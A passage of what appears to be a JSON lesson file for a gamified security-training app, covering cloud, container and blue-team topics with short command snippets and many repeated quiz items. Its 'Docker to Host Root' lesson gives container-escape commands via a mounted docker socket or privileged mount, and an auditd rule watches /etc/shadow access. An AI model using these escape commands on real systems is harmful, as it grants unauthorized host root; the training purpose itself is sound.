S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Every K8s pod has...","opts":["No access","A mounted service account token for API access","Admin access","Root access"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"g-cl-docker-privesc","cat":"Cloud & Container","title":"Docker to Host Root","diff":2,"xp":150,"intro":"Escape Docker containers to gain host root.","sections":[{"type":"text","content":"Escape Docker containers to gain host root."},{"type":"code","lang":"bash","content":"# If docker socket is mounted:\ndocker run -v /:/host --rm -it alpine chroot /host bash\n# If running as root in privileged mode:\nmount /dev/sda1 /mnt && chroot /mnt"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Docker socket + root container =...","opts":["Isolation","Full host root access","Read-only","Network access only"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"g-cl-aws-guardduty","cat":"Cloud & Container","title":"GuardDuty Findings Analysis","diff":2,"xp":150,"intro":"Analyze AWS GuardDuty threat detection findings.","sections":[{"type":"text","content":"Analyze AWS GuardDuty threat detection findings."},{"type":"code","lang":"bash","content":"aws guardduty list-findings --detector-id abc123\naws guardduty get-findings --detector-id abc123 --finding-ids id1\n# Key types: UnauthorizedAccess, CryptoCurrency, Recon, Trojan"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"GuardDuty detects...","opts":["Configuration issues","Runtime threats: crypto mining, credential compromise, recon","Compliance violations","Cost anomalies"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"g-cl-aws-config","cat":"Cloud & Container","title":"AWS Config Compliance","diff":1,"xp":75,"intro":"Monitor resource compliance against security rules.","sections":[{"type":"text","content":"Monitor resource compliance against security rules."},{"type":"code","lang":"bash","content":"aws configservice describe-compliance-by-config-rule\naws configservice get-compliance-details-by-config-rule --config-rule-name s3-bucket-public-read"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"AWS Config checks...","opts":["Network speed","Resource compliance against defined security rules","User activity","Cost optimization"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"g-df-windows-fw","cat":"Defense & Blue Team","title":"Windows Firewall Configuration","diff":1,"xp":75,"intro":"Configure Windows Defender Firewall rules.","sections":[{"type":"text","content":"Configure Windows Defender Firewall rules."},{"type":"code","lang":"bash","content":"# Block inbound\nnetsh advfirewall set allprofiles firewallpolicy blockinbound,allowoutbound\n# Allow specific port\nnetsh advfirewall firewall add rule name='Allow SSH' protocol=TCP dir=in localport=22 action=allow"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Windows Firewall default deny blocks...","opts":["Outbound","All inbound traffic not explicitly allowed","Everything","Nothing"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"g-df-selinux","cat":"Defense & Blue Team","title":"SELinux Enforcement","diff":3,"xp":200,"intro":"Mandatory access control for Linux.","sections":[{"type":"text","content":"Mandatory access control for Linux."},{"type":"code","lang":"bash","content":"getenforce  # Enforcing/Permissive/Disabled\nsetenforce 1  # enforce\nsestatus\n# Check contexts\nls -Z /var/www/html/\n# Fix contexts\nrestorecon -Rv /var/www/html/"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"SELinux confines processes by...","opts":["Permissions only","Mandatory access control policies (even root is restricted)","File ownership","Network rules"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"g-df-apparmor","cat":"Defense & Blue Team","title":"AppArmor Profiles","diff":2,"xp":150,"intro":"Application-level mandatory access control.","sections":[{"type":"text","content":"Application-level mandatory access control."},{"type":"code","lang":"bash","content":"aa-status  # list profiles\naa-enforce /etc/apparmor.d/usr.sbin.nginx\naa-complain /etc/apparmor.d/profile  # log but don't block"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"AppArmor restricts...","opts":["All users","Specific applications to predefined file/network access","Network traffic only","DNS queries"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"g-df-auditd","cat":"Defense & Blue Team","title":"Linux Auditd Configuration","diff":2,"xp":150,"intro":"Track file access, commands, and system calls.","sections":[{"type":"text","content":"Track file access, commands, and system calls."},{"type":"code","lang":"bash","content":"auditctl -w /etc/shadow -p rwa -k shadow_access\nauditctl -a always,exit -F arch=b64 -S execve -k commands\nausearch -k shadow_access\naureport --summary"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"auditd tracks...","opts":["Only network traffic","System calls, file access, and command execution","Only logins","Only errors"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"g-df-clamav","cat":"Defense & Blue Team","title":"ClamAV Antivirus","diff":1,"xp":75,"intro":"Open-source antivirus for Linux.","sections":[{"type":"text","content":"Open-source antivirus for Linux."},{"type":"code","lang":"bash","content":"freshclam  